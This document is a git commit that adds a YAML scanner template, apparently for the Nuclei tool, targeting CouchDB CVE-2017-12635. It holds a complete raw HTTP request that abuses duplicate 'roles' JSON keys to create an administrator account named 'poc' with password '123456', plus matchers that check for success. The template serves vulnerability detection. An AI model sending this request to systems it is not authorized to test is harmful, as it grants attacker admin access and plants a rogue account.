Add Apache CouchDB(CVE-2017-12635)

2021-02-15 13:31:56 +00:00 · 2021-02-15 13:31:56 +00:00 · 123b9e32ea
parent eb50c32a64
commit 123b9e32ea
1 changed files with 48 additions and 0 deletions
--- a/cves/2017/CVE-2017-12635.yaml
+++ b/cves/2017/CVE-2017-12635.yaml
@ -0,0 +1,48 @@
+id: CVE-2017-12635
+
+info:
+  name: Apache CouchDB 1.7.0 / 2.x < 2.1.1 RPE
+  author: pikpikcu
+  severity: high
+  reference: https://github.com/assalielmehdi/CVE-2017-12635
+  tags: couchdb,rpe
+
+requests:
+  - raw:
+      - |
+        PUT /_users/org.couchdb.user:poc HTTP/1.1
+        Host:  {{Hostname}}
+        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
+        Accept: application/json
+        DNT: 1
+        Connection: close
+        Upgrade-Insecure-Requests: 1
+        Content-Length: 108
+
+        {
+          "type": "user",
+          "name": "poc",
+          "roles": ["_admin"],
+          "roles": [],
+          "password": "123456"
+        }
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "application/json"
+          - "Location:"
+        part: header
+        condtion: and
+      - type: word
+        words:
+          - "org.couchdb.user:poc"
+          - "conflict"
+          - "Document update conflict"
+        part: body
+        condtion: and
+      - type: status
+        status:
+          - 201
+          - 409